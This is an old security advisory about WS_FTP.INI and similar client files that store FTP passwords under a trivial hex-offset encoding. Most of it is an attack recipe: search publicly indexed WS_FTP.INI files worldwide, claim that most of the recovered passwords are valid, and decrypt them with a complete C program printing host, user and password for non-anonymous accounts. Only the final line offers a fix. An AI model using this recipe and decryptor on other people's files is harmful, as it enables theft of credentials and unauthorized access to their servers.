COMMAND
WS_FTP.INI (and other; see below)
SYSTEMS AFFECTED
Windows
PROBLEM
Milosch Meriac has discovered the following bug/security hole.
STEP 1: Find some WS_FTP.INI files Worldwide using
http://ftpsearch.ntnu.no/ftpsearch?query=ws_ftp.ini&doit=Search&type=Case+in
sensitive+substring+search&hits=5000&matches=&hitsprmatch=&limdom=&limpath=&
f1=Count&f2=Mode&f3=Size&f4=Date&f5=Host&f6=Path&header=none&sort=date&trlen
=20
(sorted by Date & Size)
STEP 2: Approximately 30% if these Files are containing encrypted
Passords for WWW/FTP servers plus Usernames & Hosts;
---->75% of these Passwords are valid !!!
example: Content of a WS_FTP.INI-file:
[Gate]
HOST=ftp.gate.net
UID=ftp
PWD=616F71717D727B7A48
LOCDIR=D:\
DIR=/
(PWD=<encrypted Password stands here>)
STEP 3: decrypt Passwords:
The Encryption Method used in WS_FTP is _extremely_ weak! The
Password is converted (ASCII conforming) to Hex-Numbers (2
Digits)... if a Digit is at position N , then N is added to
this Digit ---> thats all! (The password mentioned in the
above example is anonymus@)
Seldom this also works with:
- EUDORA.INI
- PMAIL.INI (Pegasus Mail)
- prefs.js (Netscape)
- other INI/etc.-files (andere INI/etc.-Dateien)
All_ files/programs mentioned above have _extremely_weak_
encryption-schemes schemes. JeBe Budianto send a program to
decrypt password in ws_ftp.ini (may be used for other ini files).
/* This Program is freely distributed as long you not removed
this comment.
It's used to decrypt password on ini file, specially on
ws_ftp.ini
Written by
JeBe Budianto, Electricall Engineering ITB
E-Mail: jebe@students.itb.ac.id
jebe@EE.ITB.ac.id
Tested on FreeBSD 2.1.5
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char password[100];
void extract(void)
{
int h,i,j,k,l;
char m[2],n[2];
char ch;
i=4;h=0;
m[1]=0;
n[1]=0;
if(password[i]=='V') i=5;
while((password[i] != '\r'))
{
if(password[i]=='\n')
{ printf("\n");
exit(0);
}
m[0]=password[i];i++;
n[0]=password[i];i++;
if(isdigit(m[0]))
{ k=atoi(m);
}
else
{ ch=tolower(m[0]);
switch(ch)
{ case 'a' : k=10;break;
case 'b' : k=11;break;
case 'c' : k=12;break;
case 'd' : k=13;break;
case 'e' : k=14;break;
case 'f' : k=15;
}
}
if(isdigit(n[0]))
{ l=atoi(n);
}
else
{ ch=tolower(n[0]);
switch(ch)
{ case 'a' : l=10;break;
case 'b' : l=11;break;
case 'c' : l=12;break;
case 'd' : l=13;break;
case 'e' : l=14;break;
case 'f' : l=15;
}
}
k=(k*16)+l-h;
h++;
printf("%c",k);
}
printf("\n");
}
void main(int argc,char **argv)
{ FILE *fp;
char *sp;
int counter,complete;
char buff01[100],host[100],nama[100],namafile[100];
printf("==============================================\n");
printf("| Syntax: ProgramName IniFileName |\n");
printf("| Written by jebe@students.itb.ac.id |\n");
printf("==============================================\n");
if(argc==1)
{ printf("Use default ini file WS_FTP.INI\n");
strcpy(namafile,"WS_FTP.INI");
}
else
{ strcpy(namafile,argv[1]);
}
fp=fopen(namafile,"r");
if(fp==NULL)
{ printf("There's no ini file\n");
exit(0);
}
sp=fgets(buff01,sizeof(buff01),fp);
counter=1;
while(sp != NULL)
{
if((buff01[0]=='H' && buff01[1]=='O' && buff01[2]=='S' && buff01[3]=='T'))
{ strcpy(host,buff01);
complete=1;
}
if((buff01[0]=='U' && buff01[1]=='I' && buff01[2]=='D'))
{ strcpy(nama,buff01);
complete++;
}
if((buff01[0]=='P' && buff01[1]=='W' && buff01[2]=='D'))
{ strcpy(password,buff01);
complete++;
}
if(complete==3)
{ if(( nama[4]=='f' && nama[5]=='t' && nama[6]=='p') || (nama[4]=='a' && nama[5]=='n' && nama[6]=='o' && nama[7]=='n' && nama[8]=='y' && nama[9]=='m' && nama[10]=='o' && nama[11]=='u' && nama[12]=='s'))
{}
else
{ printf("%s",host);
printf("%s",nama);
printf("Password = ");
extract();
}
}
sp=fgets(buff01,sizeof(buff01),fp);
}
fclose(fp);
}
SOLUTION
Scan your whole Website for the File "WS_FTP.INI" and ensure that
this File ist Locked for all Users expect of the Owner.